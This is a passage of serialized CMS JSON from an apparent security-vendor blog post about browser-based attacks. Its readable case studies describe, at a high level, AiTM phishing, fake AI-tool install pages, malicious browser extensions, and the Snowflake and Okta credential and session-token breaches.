"type":707},{},{"nodeType":695,"data":7982,"content":7983},{},[7984],{"nodeType":699,"value":1103,"marks":7985,"data":7986},[],{},{"nodeType":1041,"data":7988,"content":7991},{"target":7989},{"sys":7990},{"id":1110,"type":1046,"linkType":1047},[],{"nodeType":695,"data":7993,"content":7994},{},[7995],{"nodeType":699,"value":1116,"marks":7996,"data":7997},[],{},{"nodeType":1041,"data":7999,"content":8002},{"target":8000},{"sys":8001},{"id":1123,"type":1046,"linkType":1047},[],{"nodeType":695,"data":8004,"content":8005},{},[8006,8009,8016],{"nodeType":699,"value":1129,"marks":8007,"data":8008},[],{},{"nodeType":791,"data":8010,"content":8011},{"uri":1134},[8012],{"nodeType":699,"value":1137,"marks":8013,"data":8015},[8014],{"type":799},{},{"nodeType":699,"value":1142,"marks":8017,"data":8018},[],{},{"nodeType":695,"data":8020,"content":8021},{},[8022],{"nodeType":699,"value":1149,"marks":8023,"data":8024},[],{},{"nodeType":695,"data":8026,"content":8027},{},[8028],{"nodeType":699,"value":1156,"marks":8029,"data":8030},[],{},{"nodeType":695,"data":8032,"content":8033},{},[8034],{"nodeType":699,"value":1163,"marks":8035,"data":8036},[],{},{"nodeType":1041,"data":8038,"content":8041},{"target":8039},{"sys":8040},{"id":1170,"type":1046,"linkType":1047},[],{"nodeType":721,"data":8043,"content":8044},{},[],{"nodeType":769,"data":8046,"content":8047},{},[8048],{"nodeType":699,"value":1179,"marks":8049,"data":8051},[8050],{"type":707},{},{"nodeType":695,"data":8053,"content":8054},{},[8055],{"nodeType":699,"value":1187,"marks":8056,"data":8057},[],{},{"nodeType":1041,"data":8059,"content":8062},{"target":8060},{"sys":8061},{"id":1194,"type":1046,"linkType":1047},[],{"nodeType":695,"data":8064,"content":8065},{},[8066,8069,8075,8078,8084],{"nodeType":699,"value":1200,"marks":8067,"data":8068},[],{},{"nodeType":791,"data":8070,"content":8071},{"uri":1205},[8072],{"nodeType":699,"value":1208,"marks":8073,"data":8074},[],{},{"nodeType":699,"value":1212,"marks":8076,"data":8077},[],{},{"nodeType":791,"data":8079,"content":8080},{"uri":1217},[8081],{"nodeType":699,"value":1220,"marks":8082,"data":8083},[],{},{"nodeType":699,"value":1224,"marks":8085,"data":8086},[],{},{"nodeType":695,"data":8088,"content":8089},{},[8090],{"nodeType":699,"value":1231,"marks":8091,"data":8092},[],{},{"nodeType":695,"data":8094,"content":8095},{},[8096,8099,8103],{"nodeType":699,"value":1238,"marks":8097,"data":8098},[],{},{"nodeType":699,"value":1242,"marks":8100,"data":8102},[8101],{"type":707},{},{"nodeType":699,"value":1247,"marks":8104,"data":8105},[],{},{"nodeType":695,"data":8107,"content":8108},{},[8109,8112,8118],{"nodeType":699,"value":1254,"marks":8110,"data":8111},[],{},{"nodeType":791,"data":8113,"content":8114},{"uri":1259},[8115],{"nodeType":699,"value":1262,"marks":8116,"data":8117},[],{},{"nodeType":699,"value":1266,"marks":8119,"data":8120},[],{},{"nodeType":695,"data":8122,"content":8123},{},[8124],{"nodeType":699,"value":1273,"marks":8125,"data":8126},[],{},{"nodeType":1041,"data":8128,"content":8131},{"target":8129},{"sys":8130},{"id":1280,"type":1046,"linkType":1047},[],{"nodeType":721,"data":8133,"content":8134},{},[],{"nodeType":769,"data":8136,"content":8137},{},[8138],{"nodeType":699,"value":1289,"marks":8139,"data":8141},[8140],{"type":707},{},{"nodeType":695,"data":8143,"content":8144},{},[8145,8148,8154],{"nodeType":699,"value":1297,"marks":8146,"data":8147},[],{},{"nodeType":791,"data":8149,"content":8150},{"uri":1302},[8151],{"nodeType":699,"value":1305,"marks":8152,"data":8153},[],{},{"nodeType":699,"value":1309,"marks":8155,"data":8156},[],{},{"nodeType":695,"data":8158,"content":8159},{},[8160],{"nodeType":699,"value":1316,"marks":8161,"data":8162},[],{},{"nodeType":695,"data":8164,"content":8165},{},[8166,8170,8173,8179],{"nodeType":699,"value":265,"marks":8167,"data":8169},[8168],{"type":707},{},{"nodeType":699,"value":1327,"marks":8171,"data":8172},[],{},{"nodeType":791,"data":8174,"content":8175},{"uri":1332},[8176],{"nodeType":699,"value":1335,"marks":8177,"data":8178},[],{},{"nodeType":699,"value":1339,"marks":8180,"data":8181},[],{},{"nodeType":695,"data":8183,"content":8184},{},[8185,8189,8192,8198,8201,8205],{"nodeType":699,"value":260,"marks":8186,"data":8188},[8187],{"type":707},{},{"nodeType":699,"value":1350,"marks":8190,"data":8191},[],{},{"nodeType":791,"data":8193,"content":8194},{"uri":1355},[8195],{"nodeType":699,"value":1358,"marks":8196,"data":8197},[],{},{"nodeType":699,"value":1362,"marks":8199,"data":8200},[],{},{"nodeType":699,"value":1366,"marks":8202,"data":8204},[8203],{"type":707},{},{"nodeType":699,"value":1371,"marks":8206,"data":8207},[],{},{"nodeType":695,"data":8209,"content":8210},{},[8211,8215,8218,8224,8227,8233],{"nodeType":699,"value":1378,"marks":8212,"data":8214},[8213],{"type":707},{},{"nodeType":699,"value":1383,"marks":8216,"data":8217},[],{},{"nodeType":791,"data":8219,"content":8220},{"uri":1388},[8221],{"nodeType":699,"value":1391,"marks":8222,"data":8223},[],{},{"nodeType":699,"value":1395,"marks":8225,"data":8226},[],{},{"nodeType":791,"data":8228,"content":8229},{"uri":1400},[8230],{"nodeType":699,"value":1403,"marks":8231,"data":8232},[],{},{"nodeType":699,"value":1407,"marks":8234,"data":8235},[],{},{"nodeType":695,"data":8237,"content":8238},{},[8239],{"nodeType":699,"value":1414,"marks":8240,"data":8241},[],{},{"nodeType":1041,"data":8243,"content":8246},{"target":8244},{"sys":8245},{"id":1421,"type":1046,"linkType":1047},[],{"nodeType":721,"data":8248,"content":8249},{},[],{"nodeType":769,"data":8251,"content":8252},{},[8253],{"nodeType":699,"value":1430,"marks":8254,"data":8256},[8255],{"type":707},{},{"nodeType":695,"data":8258,"content":8259},{},[8260],{"nodeType":699,"value":1438,"marks":8261,"data":8262},[],{},{"nodeType":1041,"data":8264,"content":8267},{"target":8265},{"sys":8266},{"id":1445,"type":1046,"linkType":1047},[],{"nodeType":695,"data":8269,"content":8270},{},[8271,8274,8280],{"nodeType":699,"value":1451,"marks":8272,"data":8273},[],{},{"nodeType":791,"data":8275,"content":8276},{"uri":1456},[8277],{"nodeType":699,"value":1459,"marks":8278,"data":8279},[],{},{"nodeType":699,"value":1463,"marks":8281,"data":8282},[],{},{"nodeType":695,"data":8284,"content":8285},{},[8286],{"nodeType":699,"value":1470,"marks":8287,"data":8288},[],{},{"nodeType":695,"data":8290,"content":8291},{},[8292,8295,8299,8302,8308],{"nodeType":699,"value":1477,"marks":8293,"data":8294},[],{},{"nodeType":699,"value":1481,"marks":8296,"data":8298},[8297],{"type":707},{},{"nodeType":699,"value":1486,"marks":8300,"data":8301},[],{},{"nodeType":791,"data":8303,"content":8304},{"uri":1491},[8305],{"nodeType":699,"value":1494,"marks":8306,"data":8307},[],{},{"nodeType":699,"value":1498,"marks":8309,"data":8310},[],{},{"nodeType":695,"data":8312,"content":8313},{},[8314,8317,8323,8326,8332],{"nodeType":699,"value":1505,"marks":8315,"data":8316},[],{},{"nodeType":791,"data":8318,"content":8319},{"uri":1510},[8320],{"nodeType":699,"value":1513,"marks":8321,"data":8322},[],{},{"nodeType":699,"value":1517,"marks":8324,"data":8325},[],{},{"nodeType":791,"data":8327,"content":8328},{"uri":1522},[8329],{"nodeType":699,"value":1525,"marks":8330,"data":8331},[],{},{"nodeType":699,"value":1529,"marks":8333,"data":8334},[],{},{"nodeType":1041,"data":8336,"content":8339},{"target":8337},{"sys":8338},{"id":1536,"type":1046,"linkType":1047},[],{"nodeType":721,"data":8341,"content":8342},{},[],{"nodeType":769,"data":8344,"content":8345},{},[8346],{"nodeType":699,"value":1545,"marks":8347,"data":8349},[8348],{"type":707},{},{"nodeType":695,"data":8351,"content":8352},{},[8353],{"nodeType":699,"value":1553,"marks":8354,"data":8355},[],{},{"nodeType":1041,"data":8357,"content":8360},{"target":8358},{"sys":8359},{"id":1560,"type":1046,"linkType":1047},[],{"nodeType":695,"data":8362,"content":8363},{},[8364,8367,8373],{"nodeType":699,"value":1566,"marks":8365,"data":8366},[],{},{"nodeType":791,"data":8368,"content":8369},{"uri":1571},[8370],{"nodeType":699,"value":1574,"marks":8371,"data":8372},[],{},{"nodeType":699,"value":1578,"marks":8374,"data":8375},[],{},{"nodeType":695,"data":8377,"content":8378},{},[8379],{"nodeType":699,"value":1585,"marks":8380,"data":8381},[],{},{"nodeType":1589,"data":8383,"content":8384},{},[8385,8398,8411],{"nodeType":1593,"data":8386,"content":8387},{},[8388],{"nodeType":695,"data":8389,"content":8390},{},[8391,8395],{"nodeType":699,"value":1600,"marks":8392,"data":8394},[8393],{"type":707},{},{"nodeType":699,"value":1605,"marks":8396,"data":8397},[],{},{"nodeType":1593,"data":8399,"content":8400},{},[8401],{"nodeType":695,"data":8402,"content":8403},{},[8404,8408],{"nodeType":699,"value":1615,"marks":8405,"data":8407},[8406],{"type":707},{},{"nodeType":699,"value":1620,"marks":8409,"data":8410},[],{},{"nodeType":1593,"data":8412,"content":8413},{},[8414],{"nodeType":695,"data":8415,"content":8416},{},[8417,8421],{"nodeType":699,"value":1630,"marks":8418,"data":8420},[8419],{"type":707},{},{"nodeType":699,"value":1635,"marks":8422,"data":8423},[],{},{"nodeType":695,"data":8425,"content":8426},{},[8427,8430,8436,8439,8443,8446,8452],{"nodeType":699,"value":1642,"marks":8428,"data":8429},[],{},{"nodeType":791,"data":8431,"content":8432},{"uri":1647},[8433],{"nodeType":699,"value":1650,"marks":8434,"data":8435},[],{},{"nodeType":699,"value":1654,"marks":8437,"data":8438},[],{},{"nodeType":699,"value":1658,"marks":8440,"data":8442},[8441],{"type":707},{},{"nodeType":699,"value":1663,"marks":8444,"data":8445},[],{},{"nodeType":791,"data":8447,"content":8448},{"uri":1491},[8449],{"nodeType":699,"value":1494,"marks":8450,"data":8451},[],{},{"nodeType":699,"value":1673,"marks":8453,"data":8454},[],{},{"nodeType":695,"data":8456,"content":8457},{},[8458],{"nodeType":699,"value":1680,"marks":8459,"data":8460},[],{},{"nodeType":1041,"data":8462,"content":8465},{"target":8463},{"sys":8464},{"id":1687,"type":1046,"linkType":1047},[],{"nodeType":721,"data":8467,"content":8468},{},[],{"nodeType":769,"data":8470,"content":8471},{},[8472],{"nodeType":699,"value":1696,"marks":8473,"data":8475},[8474],{"type":707},{},{"nodeType":695,"data":8477,"content":8478},{},[8479],{"nodeType":699,"value":1704,"marks":8480,"data":8481},[],{},{"nodeType":695,"data":8483,"content":8484},{},[8485],{"nodeType":699,"value":1711,"marks":8486,"data":8487},[],{},{"nodeType":695,"data":8489,"content":8490},{},[8491,8494,8500,8503,8507],{"nodeType":699,"value":1718,"marks":8492,"data":8493},[],{},{"nodeType":791,"data":8495,"content":8496},{"uri":1491},[8497],{"nodeType":699,"value":1725,"marks":8498,"data":8499},[],{},{"nodeType":699,"value":1654,"marks":8501,"data":8502},[],{},{"nodeType":699,"value":1732,"marks":8504,"data":8506},[8505],{"type":707},{},{"nodeType":699,"value":1737,"marks":8508,"data":8509},[],{},{"nodeType":695,"data":8511,"content":8512},{},[8513,8516,8522],{"nodeType":699,"value":1744,"marks":8514,"data":8515},[],{},{"nodeType":791,"data":8517,"content":8518},{"uri":1749},[8519],{"nodeType":699,"value":1752,"marks":8520,"data":8521},[],{},{"nodeType":699,"value":1756,"marks":8523,"data":8524},[],{},{"nodeType":1041,"data":8526,"content":8529},{"target":8527},{"sys":8528},{"id":1763,"type":1046,"linkType":1047},[],{"nodeType":721,"data":8531,"content":8532},{},[],{"nodeType":725,"data":8534,"content":8535},{},[8536],{"nodeType":699,"value":1772,"marks":8537,"data":8539},[8538],{"type":707},{},{"nodeType":695,"data":8541,"content":8542},{},[8543,8546,8552],{"nodeType":699,"value":1780,"marks":8544,"data":8545},[],{},{"nodeType":791,"data":8547,"content":8548},{"uri":793},[8549],{"nodeType":699,"value":1787,"marks":8550,"data":8551},[],{},{"nodeType":699,"value":1791,"marks":8553,"data":8554},[],{},{"nodeType":695,"data":8556,"content":8557},{},[8558],{"nodeType":699,"value":909,"marks":8559,"data":8560},[],{},{"nodeType":695,"data":8562,"content":8563},{},[8564],{"nodeType":699,"value":916,"marks":8565,"data":8566},[],{},{"nodeType":695,"data":8568,"content":8569},{},[8570,8573,8580],{"nodeType":699,"value":1810,"marks":8571,"data":8572},[],{},{"nodeType":791,"data":8574,"content":8575},{"uri":927},[8576],{"nodeType":699,"value":1817,"marks":8577,"data":8579},[8578],{"type":799},{},{"nodeType":699,"value":1407,"marks":8581,"data":8582},[],{},{"entries":8584},{"hyperlink":8585,"inline":8586,"block":8587},[],[],[8588,8595,8600,8606,8625,8629,8670,8700,8704,8723,8727,8771],{"sys":8589,"__typename":4982,"title":8590,"caption":8590,"layoutMode":60,"file":8591},{"id":1045},"Attacks have shifted from targeting local networks to internet services, accessed through employee web browsers.",{"url":8592,"width":8593,"height":8594},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2TRbV3HLZRt0pjgxPAPUOY\u002F5dbeec4b4ac16a3b450e1eff2add6266\u002F1.png",1174,482,{"sys":8596,"__typename":8597,"title":8598,"youTubeUrl":8599},{"id":1110},"EmbeddedVideo","Push Explains: The Evolution of Phishing","https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=t3UaE58LvYA",{"sys":8601,"__typename":4982,"title":8602,"caption":8602,"layoutMode":60,"file":8603},{"id":1123},"Phishing is now multi- and cross-channel, targeting a vast range of cloud and SaaS apps using flexible AitM toolkits — but all roads inevitably lead to the browser.",{"url":8604,"width":4986,"height":8605},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F1Fq4iSo4ssD0bdINZ4M31q\u002F28d89ce5b8af767b37d2acb54a1c78cf\u002F2.png",1003,{"sys":8607,"__typename":4990,"content":8608,"name":8624,"title":60},{"id":1170},{"json":8609},{"nodeType":691,"data":8610,"content":8611},{},[8612],{"nodeType":695,"data":8613,"content":8614},{},[8615,8620],{"nodeType":699,"value":8616,"marks":8617,"data":8619},"Case study: Scattered Lapsus$ Hunters' (SLH) real-time AiTM campaign. ",[8618],{"type":707},{},{"nodeType":699,"value":8621,"marks":8622,"data":8623},"SLH targeted 100+ companies — including Betterment, Crunchbase, SoundCloud, and Match Group — with tens of millions of records stolen as a result. Powered by real-time operated kits where attackers walk victims through the login in real time via voice phishing, these attacks combine a branded phishing page, real-time session relay, persistent passkey registration by the attacker for ongoing access, and a confirmation email to reduce suspicion — followed by mass data exfiltration from enterprise cloud and SaaS. ",[],{},"6 browser attacks IB1",{"sys":8626,"__typename":8597,"title":8627,"youTubeUrl":8628},{"id":1194},"Push Explains: ClickFix","https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=79ZlINvdY6U",{"sys":8630,"__typename":4990,"content":8631,"name":8669,"title":60},{"id":1280},{"json":8632},{"nodeType":691,"data":8633,"content":8634},{},[8635],{"nodeType":695,"data":8636,"content":8637},{},[8638,8643,8647,8654,8658,8665],{"nodeType":699,"value":8639,"marks":8640,"data":8642},"Case study: InstallFix — AI-themed lures take advantage of users looking to install AI tools. ",[8641],{"type":707},{},{"nodeType":699,"value":8644,"marks":8645,"data":8646},"Push discovered and named ",[],{},{"nodeType":791,"data":8648,"content":8650},{"uri":8649},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Finstallfix",[8651],{"nodeType":699,"value":4841,"marks":8652,"data":8653},[],{},{"nodeType":699,"value":8655,"marks":8656,"data":8657},", involving malicious imitations of popular AI tool pages, including Claude Code and NotebookLM, being distributed over search engines via malvertising. Because these tools are often installed via command-line script, attackers created pixel-perfect clones of real pages where the install instructions had been replaced with a malicious command. Running the command installed infostealer malware on the victim's machine. The later ",[],{},{"nodeType":791,"data":8659,"content":8661},{"uri":8660},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fllmshare-malvertising-campaign",[8662],{"nodeType":699,"value":7534,"marks":8663,"data":8664},[],{},{"nodeType":699,"value":8666,"marks":8667,"data":8668}," campaign we identified used a similar pattern, but combined it with shared chat artefacts on Claude and ChatGPT for added legitimacy. ",[],{},"Browser attacks update IB3",{"sys":8671,"__typename":4990,"content":8672,"name":8699,"title":60},{"id":1421},{"json":8673},{"data":8674,"content":8675,"nodeType":691},{},[8676],{"data":8677,"content":8678,"nodeType":695},{},[8679,8684,8688,8695],{"data":8680,"marks":8681,"value":8683,"nodeType":699},{},[8682],{"type":707},"Case study: Mass Salesforce breaches via device code phishing. ",{"data":8685,"marks":8686,"value":8687,"nodeType":699},{},[],"Scattered Lapsus$ Hunters' 2025 Salesforce campaign resulted in a claimed ",{"data":8689,"content":8690,"nodeType":791},{"uri":1030},[8691],{"data":8692,"marks":8693,"value":8694,"nodeType":699},{},[],"1,000+ organizations compromised and 1.5 billion records stolen",{"data":8696,"marks":8697,"value":8698,"nodeType":699},{},[]," — used to extort victims en masse, including an attempt against Salesforce directly. Attackers registered a malicious Salesforce app called \"DataLoader\" (a fake version of the legitimate app), called victims impersonating IT, and talked them through opening Salesforce and authorizing the new app. The app had broad OAuth scopes — full Salesforce API access and refresh tokens without re-auth — enabling mass data exfiltration via API. The stolen data was then used in further supply chain attacks against downstream organizations.","Browser attacks update IB4",{"sys":8701,"__typename":8597,"title":8702,"youTubeUrl":8703},{"id":1445},"Push Explains: Malicious Browser Extensions","https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=PRLSGrgvqtM",{"sys":8705,"__typename":4990,"content":8706,"name":8722,"title":60},{"id":1536},{"json":8707},{"nodeType":691,"data":8708,"content":8709},{},[8710],{"nodeType":695,"data":8711,"content":8712},{},[8713,8718],{"nodeType":699,"value":8714,"marks":8715,"data":8717},"Case study: DarkSpectre — China-linked extension campaign spanning 7 years and 8.8 million victims. ",[8716],{"type":707},{},{"nodeType":699,"value":8719,"marks":8720,"data":8721},"DarkSpectre is a China-attributed threat actor that operated three coordinated malicious browser extension campaigns across Chrome, Edge, and Firefox for over seven years, compromising 8.8 million users before being exposed in December 2025. The actor published functional extensions — new tab dashboards, video downloaders, meeting productivity tools — that operated legitimately for 3–5 years, building install bases in the millions and earning Chrome Web Store \"Verified\" badges. Once an extension had a large enough user base, the actor pushed malicious payloads through server-side configuration changes, gated behind a 3-day dormancy timer and executed on only ~10% of page loads to reduce detection surface. At discovery, 85 additional \"sleeper\" extensions were still in this trust-building phase.",[],{},"Browser attacks update IB5",{"sys":8724,"__typename":8597,"title":8725,"youTubeUrl":8726},{"id":1560},"Push Explains: Ghost Logins","https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=dewfzVBFnDs",{"sys":8728,"__typename":4990,"content":8729,"name":8770,"title":60},{"id":1687},{"json":8730},{"nodeType":691,"data":8731,"content":8732},{},[8733],{"nodeType":695,"data":8734,"content":8735},{},[8736,8741,8745,8752,8756,8761,8765],{"nodeType":699,"value":8737,"marks":8738,"data":8740},"Case study: Snowflake. ",[8739],{"type":707},{},{"nodeType":699,"value":8742,"marks":8743,"data":8744},"ShinyHunters (part of Scattered Lapsus$ Hunters) breached ",[],{},{"nodeType":791,"data":8746,"content":8747},{"uri":1017},[8748],{"nodeType":699,"value":8749,"marks":8750,"data":8751},"165+ organizations",[],{},{"nodeType":699,"value":8753,"marks":8754,"data":8755}," using stolen credentials, logging into their Snowflake tenants and mass-dumping data via direct SQL commands. The attacker harvested credentials from underground marketplaces, identified platform-wide MFA gaps, developed a script for rapid exploitation, and executed a mass credential-stuffing campaign — ultimately stealing over ",[],{},{"nodeType":699,"value":8757,"marks":8758,"data":8760},"1 billion records from just 9 publicly named victims",[8759],{"type":707},{},{"nodeType":699,"value":8762,"marks":8763,"data":8764},", with the real impact likely far greater. ",[],{},{"nodeType":699,"value":8766,"marks":8767,"data":8769},"80% of compromised accounts had prior breach exposure in datasets dating back to 2020.",[8768],{"type":707},{},"Browser attacks update IB6",{"sys":8772,"__typename":4990,"content":8773,"name":8789,"title":60},{"id":1763},{"json":8774},{"nodeType":691,"data":8775,"content":8776},{},[8777],{"nodeType":695,"data":8778,"content":8779},{},[8780,8785],{"nodeType":699,"value":8781,"marks":8782,"data":8784},"Case study: Okta session theft cascades into customer compromise. ",[8783],{"type":707},{},{"nodeType":699,"value":8786,"marks":8787,"data":8788},"In 2023, an Okta support engineer was infected with infostealer malware. The attacker (reportedly Scattered Spider) accessed Okta's customer support system and exfiltrated sensitive files containing session tokens — then replayed those tokens to access customer environments. Corporate credentials had been synced to the engineer's personal Google account via Chrome profile sync and were stolen along with everything else. The attacker signed into Okta's customer support portal using the synced credentials, downloaded HAR files containing active customer session tokens, and accessed 134 downstream customer Okta tenants, moving laterally into connected apps. BeyondTrust, 1Password, and Cloudflare all reported further activity. Cloudflare saw attackers access their internal Atlassian, including Confluence, Jira, and Bitbucket source code. A key lesson: business credentials can transit personal and managed devices through features like Chrome profile sync — easy to enable, hard to track.",[],{},"Browser attacks update IB7",{"items":8791},[],{},"6 browser-based attacks security teams need to know about","thought-leadership",{"items":8796},[8797,9857,10510],{"__typename":952,"sys":8798,"content":8799,"title":3638,"synopsis":3639,"hashTags":60,"publishedDate":3640,"slug":3641,"tagsCollection":9847,"authorsCollection":9853},{"id":2344},{"json":8800},{"data":8801,"content":8802,"nodeType":691},{},[8803,8809,8812,8819,8843,8850,8855,8879,8966,8999,9006,9048,9072,9077,9080,9087,9093,9100,9115,9157,9162,9168,9183,9188,9194,9199,9205,9210,9216,9221,9228,9261,9285,9300,9324,9331,9355,9379,9403,9410,9416,9431,9473,9497,9504,9519,9552,9555,9562,9568,9574,9589,9594,9600,9694,9727,9734,9749,9755,9758,9765,9771,9810,9816,9819,9825,9831],{"data":8804,"content":8805,"nodeType":695},{},[8806],{"data":8807,"marks":8808,"value":2355,"nodeType":699},{},[],{"data":8810,"content":8811,"nodeType":721},{},[],{"data":8813,"content":8814,"nodeType":725},{},[8815],{"data":8816,"marks":8817,"value":2366,"nodeType":699},{},[8818],{"type":707},{"data":8820,"content":8821,"nodeType":695},{},[8822,8825,8831,8834,8840],{"data":8823,"marks":8824,"value":2373,"nodeType":699},{},[],{"data":8826,"content":8827,"nodeType":791},{"uri":2376},[8828],{"data":8829,"marks":8830,"value":2381,"nodeType":699},{},[],{"data":8832,"marks":8833,"value":2385,"nodeType":699},{},[],{"data":8835,"content":8836,"nodeType":791},{"uri":1030},[8837],{"data":8838,"marks":8839,"value":2392,"nodeType":699},{},[],{"data":8841,"marks":8842,"value":2396,"nodeType":699},{},[],{"data":8844,"content":8845,"nodeType":695},{},[8846],{"data":8847,"marks":8848,"value":2404,"nodeType":699},{},[8849],{"type":707},{"data":8851,"content":8854,"nodeType":1041},{"target":8852},{"sys":8853},{"id":2409,"type":1046,"linkType":1047},[],{"data":8856,"content":8857,"nodeType":695},{},[8858,8861,8867,8870,8876],{"data":8859,"marks":8860,"value":2417,"nodeType":699},{},[],{"data":8862,"content":8863,"nodeType":791},{"uri":2420},[8864],{"data":8865,"marks":8866,"value":2425,"nodeType":699},{},[],{"data":8868,"marks":8869,"value":2429,"nodeType":699},{},[],{"data":8871,"content":8872,"nodeType":791},{"uri":2432},[8873],{"data":8874,"marks":8875,"value":2437,"nodeType":699},{},[],{"data":8877,"marks":8878,"value":2441,"nodeType":699},{},[],{"data":8880,"content":8881,"nodeType":695},{},[8882,8885,8891,8894,8900,8903,8909,8912,8918,8921,8927,8930,8936,8939,8945,8948,8954,8957,8963],{"data":8883,"marks":8884,"value":2448,"nodeType":699},{},[],{"data":8886,"content":8887,"nodeType":791},{"uri":2451},[8888],{"data":8889,"marks":8890,"value":2456,"nodeType":699},{},[],{"data":8892,"marks":8893,"value":2460,"nodeType":699},{},[],{"data":8895,"content":8896,"nodeType":791},{"uri":2463},[8897],{"data":8898,"marks":8899,"value":2468,"nodeType":699},{},[],{"data":8901,"marks":8902,"value":2472,"nodeType":699},{},[],{"data":8904,"content":8905,"nodeType":791},{"uri":2475},[8906],{"data":8907,"marks":8908,"value":2480,"nodeType":699},{},[],{"data":8910,"marks":8911,"value":2484,"nodeType":699},{},[],{"data":8913,"content":8914,"nodeType":791},{"uri":2487},[8915],{"data":8916,"marks":8917,"value":2492,"nodeType":699},{},[],{"data":8919,"marks":8920,"value":2496,"nodeType":699},{},[],{"data":8922,"content":8923,"nodeType":791},{"uri":2499},[8924],{"data":8925,"marks":8926,"value":2504,"nodeType":699},{},[],{"data":8928,"marks":8929,"value":2508,"nodeType":699},{},[],{"data":8931,"content":8932,"nodeType":791},{"uri":2511},[8933],{"data":8934,"marks":8935,"value":2516,"nodeType":699},{},[],{"data":8937,"marks":8938,"value":2520,"nodeType":699},{},[],{"data":8940,"content":8941,"nodeType":791},{"uri":2523},[8942],{"data":8943,"marks":8944,"value":2528,"nodeType":699},{},[],{"data":8946,"marks":8947,"value":2532,"nodeType":699},{},[],{"data":8949,"content":8950,"nodeType":791},{"uri":2535},[8951],{"data":8952,"marks":8953,"value":2540,"nodeType":699},{},[],{"data":8955,"marks":8956,"value":2544,"nodeType":699},{},[],{"data":8958,"content":8959,"nodeType":791},{"uri":2547},[8960],{"data":8961,"marks":8962,"value":2552,"nodeType":699},{},[],{"data":8964,"marks":8965,"value":2556,"nodeType":699},{},[],{"data":8967,"content":8968,"nodeType":695},{},[8969,8972,8978,8981,8987,8990,8996],{"data":8970,"marks":8971,"value":2563,"nodeType":699},{},[],{"data":8973,"content":8974,"nodeType":791},{"uri":1355},[8975],{"data":8976,"marks":8977,"value":2570,"nodeType":699},{},[],{"data":8979,"marks":8980,"value":2574,"nodeType":699},{},[],{"data":8982,"content":8983,"nodeType":791},{"uri":2577},[8984],{"data":8985,"marks":8986,"value":2582,"nodeType":699},{},[],{"data":8988,"marks":8989,"value":2586,"nodeType":699},{},[],{"data":8991,"content":8992,"nodeType":791},{"uri":2589},[8993],{"data":8994,"marks":8995,"value":2594,"nodeType":699},{},[],{"data":8997,"marks":8998,"value":1407,"nodeType":699},{},[],{"data":9000,"content":9001,"nodeType":769},{},[9002],{"data":9003,"marks":9004,"value":2605,"nodeType":699},{},[9005],{"type":707},{"data":9007,"content":9008,"nodeType":695},{},[9009,9012,9018,9021,9027,9030,9036,9039,9045],{"data":9010,"marks":9011,"value":2612,"nodeType":699},{},[],{"data":9013,"content":9014,"nodeType":791},{"uri":2615},[9015],{"data":9016,"marks":9017,"value":2620,"nodeType":699},{},[],{"data":9019,"marks":9020,"value":2624,"nodeType":699},{},[],{"data":9022,"content":9023,"nodeType":791},{"uri":2627},[9024],{"data":9025,"marks":9026,"value":2632,"nodeType":699},{},[],{"data":9028,"marks":9029,"value":2636,"nodeType":699},{},[],{"data":9031,"content":9032,"nodeType":791},{"uri":2639},[9033],{"data":9034,"marks":9035,"value":2644,"nodeType":699},{},[],{"data":9037,"marks":9038,"value":2648,"nodeType":699},{},[],{"data":9040,"content":9041,"nodeType":791},{"uri":2651},[9042],{"data":9043,"marks":9044,"value":2656,"nodeType":699},{},[],{"data":9046,"marks":9047,"value":2660,"nodeType":699},{},[],{"data":9049,"content":9050,"nodeType":695},{},[9051,9054,9060,9063,9069],{"data":9052,"marks":9053,"value":2667,"nodeType":699},{},[],{"data":9055,"content":9056,"nodeType":791},{"uri":2670},[9057],{"data":9058,"marks":9059,"value":2675,"nodeType":699},{},[],{"data":9061,"marks":9062,"value":2679,"nodeType":699},{},[],{"data":9064,"content":9065,"nodeType":791},{"uri":2682},[9066],{"data":9067,"marks":9068,"value":2687,"nodeType":699},{},[],{"data":9070,"marks":9071,"value":2691,"nodeType":699},{},[],{"data":9073,"content":9076,"nodeType":1041},{"target":9074},{"sys":9075},{"id":2696,"type":1046,"linkType":1047},[],{"data":9078,"content":9079,"nodeType":721},{},[],{"data":9081,"content":9082,"nodeType":725},{},[9083],{"data":9084,"marks":9085,"value":2708,"nodeType":699},{},[9086],{"type":707},{"data":9088,"content":9089,"nodeType":695},{},[9090],{"data":9091,"marks":9092,"value":2715,"nodeType":699},{},[],{"data":9094,"content":9095,"nodeType":769},{},[9096],{"data":9097,"marks":9098,"value":2723,"nodeType":699},{},[9099],{"type":707},{"data":9101,"content":9102,"nodeType":695},{},[9103,9106,9112],{"data":9104,"marks":9105,"value":2730,"nodeType":699},{},[],{"data":9107,"content":9108,"nodeType":791},{"uri":1355},[9109],{"data":9110,"marks":9111,"value":2570,"nodeType":699},{},[],{"data":9113,"marks":9114,"value":2740,"nodeType":699},{},[],{"data":9116,"content":9117,"nodeType":695},{},[9118,9121,9127,9130,9136,9139,9145,9148,9154],{"data":9119,"marks":9120,"value":2747,"nodeType":699},{},[],{"data":9122,"content":9123,"nodeType":791},{"uri":2750},[9124],{"data":9125,"marks":9126,"value":2755,"nodeType":699},{},[],{"data":9128,"marks":9129,"value":2759,"nodeType":699},{},[],{"data":9131,"content":9132,"nodeType":791},{"uri":2762},[9133],{"data":9134,"marks":9135,"value":2767,"nodeType":699},{},[],{"data":9137,"marks":9138,"value":2771,"nodeType":699},{},[],{"data":9140,"content":9141,"nodeType":791},{"uri":2774},[9142],{"data":9143,"marks":9144,"value":2779,"nodeType":699},{},[],{"data":9146,"marks":9147,"value":2783,"nodeType":699},{},[],{"data":9149,"content":9150,"nodeType":791},{"uri":2786},[9151],{"data":9152,"marks":9153,"value":2791,"nodeType":699},{},[],{"data":9155,"marks":9156,"value":2795,"nodeType":699},{},[],{"data":9158,"content":9161,"nodeType":1041},{"target":9159},{"sys":9160},{"id":2800,"type":1046,"linkType":1047},[],{"data":9163,"content":9164,"nodeType":695},{},[9165],{"data":9166,"marks":9167,"value":2808,"nodeType":699},{},[],{"data":9169,"content":9170,"nodeType":695},{},[9171,9174,9180],{"data":9172,"marks":9173,"value":2815,"nodeType":699},{}